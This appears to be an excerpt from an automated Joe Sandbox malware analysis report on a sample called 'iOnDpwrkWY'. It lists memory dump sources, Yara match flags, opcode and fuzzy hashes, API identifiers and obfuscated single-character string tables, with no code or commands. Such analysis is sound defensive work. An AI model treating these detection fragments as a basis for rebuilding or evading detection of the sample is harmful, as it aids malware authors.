                                  • Opcode Fuzzy Hash: f1935557e2f2806b9940cce5b2d267874e1034516f04e5d51b8115aeefe7cdf9
                                  • Instruction Fuzzy Hash: BA1138B2B0979147E71C8E3984113BABAD297D6318F2CC57CC4C6D7285DA3888118745
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4a164414c649293df32a122712d6e0e106fe21d8b546922be5564c9c7b9508f0
                                  • Instruction ID: 4a11f588b1b85e15c930acd21b91cdfc680f76e16d96864221ad48b21a142b70
                                  • Opcode Fuzzy Hash: 4a164414c649293df32a122712d6e0e106fe21d8b546922be5564c9c7b9508f0
                                  • Instruction Fuzzy Hash: 1A01643460A2119BE3109F6CE985A3FB3E6EBC2340F18D438F28493196DB34CC42D716
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                  • Instruction ID: f19e0b948b1c923392f6e5a8e0d5f864ac969a7435732a1a70777de3f91675ae
                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                  • Instruction Fuzzy Hash: 7B11E533E455E04EC3168E3C9800565BFE31AA3274F6D87A9F4B99B2D2D6338D8B8751
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                  • Instruction ID: 1bdb52c757136d0f491bb15e4131204bafb517a34a554dccf387603b88e59a22
                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                  • Instruction Fuzzy Hash: 4D11EC336055D40EC3198D3C84006657FD31AB7235F6953DAF4B89B2D3D5268DCA8359
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e4a6bce38bb77cb855b0c1b2651f63ca23977da10de64c19d828eeec774b109c
                                  • Instruction ID: e57aecedd77e736925f42865a4c1b6b29e40c27a866833321ade664fcfc518db
                                  • Opcode Fuzzy Hash: e4a6bce38bb77cb855b0c1b2651f63ca23977da10de64c19d828eeec774b109c
                                  • Instruction Fuzzy Hash: 0901D4F160270147DB209F5084C1BBBB7A86FA0740F19442CEA595B201EF76ECC5D7A2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
                                  • Instruction ID: 3de76f9d274b52e90d2ef9e87ec8d3366dafd7d2e10265ff4f1f4711345407d1
                                  • Opcode Fuzzy Hash: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
                                  • Instruction Fuzzy Hash: 7601B1F570171147D720AE51A9C0B27B2B86FC0748F19443EEC4457342DB7DEC29869E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                  • Instruction ID: 8872ed0bc2ec727758ba38dc8d1caad35a4170ffa6704564b791cea6927d8e5a
                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                  • Instruction Fuzzy Hash: 5701A276A016088FDF21CF64C904BBA33EDFBD6316F4544A5DA0A9B282E774A9418F90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
                                  • Instruction ID: 34e981112378c59cf45707eac27e4188cbaca79d234523b47ecff1cb0040ee73
                                  • Opcode Fuzzy Hash: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
                                  • Instruction Fuzzy Hash: 59016DB9C00624EFEF00AF55DC01B9E77B6AB0A324F0414A5E508BB392D731ED10CB95
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6136a0a86494c0451f0a8cc20dd56009850612ffaa73c5348e62317f6daaf908
                                  • Instruction ID: 9f7c3c1e053ea50b657f7d19e39e5329619089ae092b8978d824725f21df4711
                                  • Opcode Fuzzy Hash: 6136a0a86494c0451f0a8cc20dd56009850612ffaa73c5348e62317f6daaf908
                                  • Instruction Fuzzy Hash: C8F0FEB2D006149FDF40EB98DC01E9A77B9AF0A350F0804A0F508BB261D622FD50CB95
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c88d2dd0d5ef8fcb1920e32d35327158bdbdf587074639a4ccac7672161239f
                                  • Instruction ID: c658aad8690c75a6cfbcbc3a0ecc7625804218b5671a020a72617d536fd074f6
                                  • Opcode Fuzzy Hash: 7c88d2dd0d5ef8fcb1920e32d35327158bdbdf587074639a4ccac7672161239f
                                  • Instruction Fuzzy Hash: 0BE0DFEFE55670139318CA215E01126B193ABD662272AA4748E8673706EA31AC0B81D4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
                                  • Instruction ID: 76115147780e5b0d0309e2a0309811062aead7e9691d40ac881d7231c88a4ab0
                                  • Opcode Fuzzy Hash: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
                                  • Instruction Fuzzy Hash: 23E0D8FFD556600397548A235C02226B1936BDA628B1AB8788E9673707EA359C0741D8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 03be019c7f84eab5680fd60e5a6e0a4c14760194c7c122451d5e0e1049be607d
                                  • Instruction ID: 38ba5401667b83b53583c15277e155f8d6a9c4e4fe2126279f00f23c3e900906
                                  • Opcode Fuzzy Hash: 03be019c7f84eab5680fd60e5a6e0a4c14760194c7c122451d5e0e1049be607d
                                  • Instruction Fuzzy Hash: 38E0E575C11110AFDB107B15FD02A1C7AB3AB62302B471535E408A7232EF325A2AEB59
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
                                  • Instruction ID: 8488e0a8640df04fcf481087a0a0e2354c4894f8e99b76394d31cfc5082ce78b
                                  • Opcode Fuzzy Hash: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
                                  • Instruction Fuzzy Hash: 6BE01279C11100BFDE046B11FC0161CBA72B76630BF46213AE40873232EF35A436A75D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 627599c8012a5de30bed4bcc5cdf041527b351da4d44e435234bf5fd0dbcc5af
                                  • Instruction ID: 98b170611be18201d290d0bd23f36df76fb754e79aab241499938053667da23b
                                  • Opcode Fuzzy Hash: 627599c8012a5de30bed4bcc5cdf041527b351da4d44e435234bf5fd0dbcc5af
                                  • Instruction Fuzzy Hash: 79D02E2A8088338B0F290F1482202B9A7230E0330038F03A088C1FFBC2CA22CC8302D8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
                                  • Instruction ID: 6e3621e5ba52bd1720ea54ad2d17b774c7841a8325dce5c8bd5a6b1d086829a3
                                  • Opcode Fuzzy Hash: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
                                  • Instruction Fuzzy Hash: 36D0C279815910CBDB047F01EC0216A73F4AB03389F04007CE88123263DB39D8288E8E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b699e929166f3269f3c0af6cf854a66d2adcb16623502ccf6fa341cc05aeb82f
                                  • Instruction ID: eab0d35e925474c42060a393e94d7003ff6c2a409aa8c18ee0e180a0ee6e0a00
                                  • Opcode Fuzzy Hash: b699e929166f3269f3c0af6cf854a66d2adcb16623502ccf6fa341cc05aeb82f
                                  • Instruction Fuzzy Hash: 54D05E72814244ABD940DB00ED02B6AF3F9FB4A704F041535B988B1061E622DA688797
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a8f9aa8a7fabceb26a773c801b96314e67806ff88a01327c7cabaf7e1195b6db
                                  • Instruction ID: 6b152daa1a23407c00f5241a5f99dc45a9bcdf3497864a9c9fd3b69c268c4520
                                  • Opcode Fuzzy Hash: a8f9aa8a7fabceb26a773c801b96314e67806ff88a01327c7cabaf7e1195b6db
                                  • Instruction Fuzzy Hash: A8D0127BF821004B9A099F10DD43B766A6397C770470CE1348905D3348EE3DE41AD10E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
                                  • Instruction ID: f6de81edf4edbd36f0565e031b671f89904ab193cb181933f1b50bd017efe36b
                                  • Opcode Fuzzy Hash: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
                                  • Instruction Fuzzy Hash: C9D0127BF9210047DA099F11DD43775666393C770870DE1398805E3348DE3CD41A840E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                  • Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
                                  • Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                  • Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                  • Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
                                  • Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                  • Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 341987432dce9904f649f917b7ed575f0bb4bb5c5b4e9ef9425cd867c06a6129
                                  • Instruction ID: 382ab58044fe2ba84d49145cbd94d705a9b2bdad904011e7b0eedcd709e6e802
                                  • Opcode Fuzzy Hash: 341987432dce9904f649f917b7ed575f0bb4bb5c5b4e9ef9425cd867c06a6129
                                  • Instruction Fuzzy Hash: 53B092B1C02C148B94513F202C029FBB6241D53380F042430EA1626202BE27E22A969F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f753dbc925eeb97c78fc90efc39af23615c529da2cdf343c0b9dd0ba408761e0
                                  • Instruction ID: c29c368d1883fe323cad5a6b3d97cdead9ba18a97cad379126c0a40fc844e1ee
                                  • Opcode Fuzzy Hash: f753dbc925eeb97c78fc90efc39af23615c529da2cdf343c0b9dd0ba408761e0
                                  • Instruction Fuzzy Hash: 73B012E0C04500C7D8009F205C01872A23C4607250F003820D108E7102E531E000820D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
                                  • Instruction ID: 02d06448f02dd76ad61b8ab648816bdf30096f71157e536fee4757e064133957
                                  • Opcode Fuzzy Hash: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
                                  • Instruction Fuzzy Hash: AEA022F8C0A800C3E800CF20BC02030F23C830B2A8F00303AE00CF3203EA30E0088A0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a4feeaae0c5d4225290c8f64d1143a34bd66befac27b9bcfb2494fe2660e1556
                                  • Instruction ID: 5f90c8482877ae364e78efe8602c82ba5110085f469652caa7ae2d3bb2038f17
                                  • Opcode Fuzzy Hash: a4feeaae0c5d4225290c8f64d1143a34bd66befac27b9bcfb2494fe2660e1556
                                  • Instruction Fuzzy Hash: AC900224D4D1008681508F449440470E279930B111F103410900CF3062C310D545455D
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocString
                                  • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                  • API String ID: 2525500382-534244583
                                  • Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                  • Instruction ID: 37a5e4fd650f145addcd00ad60ffa81f61613d972a5cc07b31b130166d72471d
                                  • Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                  • Instruction Fuzzy Hash: 9F81166010CBD28AD322C63C881874FBFD15BE7224F188B9DE1F58B3E2D6A58146C767
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: AllocString
                                  • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                  • API String ID: 2525500382-534244583
                                  • Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                  • Instruction ID: e2dddc40eb3f9dab4f65535c588d3d72a3f147e4bda3b82f36fbc837b78308fa
                                  • Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                  • Instruction Fuzzy Hash: 8481066010CBC28AD322C63C881875FBFD15BE7224F184B9DE1F58B3E6D6A98146C767
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocString
                                  • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                  • API String ID: 2525500382-534244583
                                  • Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                  • Instruction ID: 66ba1fc5a09e4880c3084887444ea66367dd3e7e25e2b55d7816f6a795bb1385
                                  • Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                  • Instruction Fuzzy Hash: 3E81E52010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: AllocString
                                  • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                  • API String ID: 2525500382-534244583
                                  • Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                  • Instruction ID: e21bf8ef08eaefae2f6608d65dd533aaf672cde794620ee92b713000d27e8169
                                  • Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                  • Instruction Fuzzy Hash: 9981F52010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Variant$ClearInit
                                  • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                  • API String ID: 2610073882-1095711290
                                  • Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                  • Instruction ID: 2bce02093698aaa1ea3c3c08ca6e81e5b519941a859eb4899220332b8c6dadef
                                  • Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                  • Instruction Fuzzy Hash: 92412821108BC1CED726CF388488646BFA16F66224F0886CDD8E54F3DBC774D51ACBA2
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: Variant$ClearInit
                                  • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                  • API String ID: 2610073882-1095711290
                                  • Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                  • Instruction ID: 67e1650e07e25dd8c979730081919a9ec74336f1c366e84b3847a4c8d399cf69
                                  • Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                  • Instruction Fuzzy Hash: 19410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Variant$ClearInit
                                  • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                  • API String ID: 2610073882-1095711290
                                  • Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                  • Instruction ID: 27a76c0a0fbd7a8593ec4f74366d359e73bfbeade20c43bbe2bbf16e793d6a45
                                  • Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                  • Instruction Fuzzy Hash: F8410820108BC1CED726CF3C8498616BFA16B66224F088ADDD8E54F3DBC375D519CB66
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: Variant$ClearInit
                                  • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                  • API String ID: 2610073882-1095711290
                                  • Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                  • Instruction ID: 5aee6742307bd22be2b72699ebf7517107c7abda4f37a595e92ffc77e439cf83
                                  • Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                  • Instruction Fuzzy Hash: 34410820108BC1CED726CF3C9488616BFA16B66224F488ADDD8E54F3DBC375D51ACB66
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InitVariant
                                  • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                  • API String ID: 1927566239-3011065302
                                  • Opcode ID: 38b59cd13938fe8317dc7d58eddabe9e0085401b214a797582b7f2cd6e6565e9
                                  • Instruction ID: dacbf268c2f9a5dff7c57841f84f30e1cbc6f16c101bd4567f4c948e42b04033
                                  • Opcode Fuzzy Hash: 38b59cd13938fe8317dc7d58eddabe9e0085401b214a797582b7f2cd6e6565e9
                                  • Instruction Fuzzy Hash: FE41097010C7C18AD365DB28849879FBFE16B96314F885A9CE6E94B3E2C7798405C753
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: InitVariant
                                  • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                  • API String ID: 1927566239-3011065302
                                  • Opcode ID: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
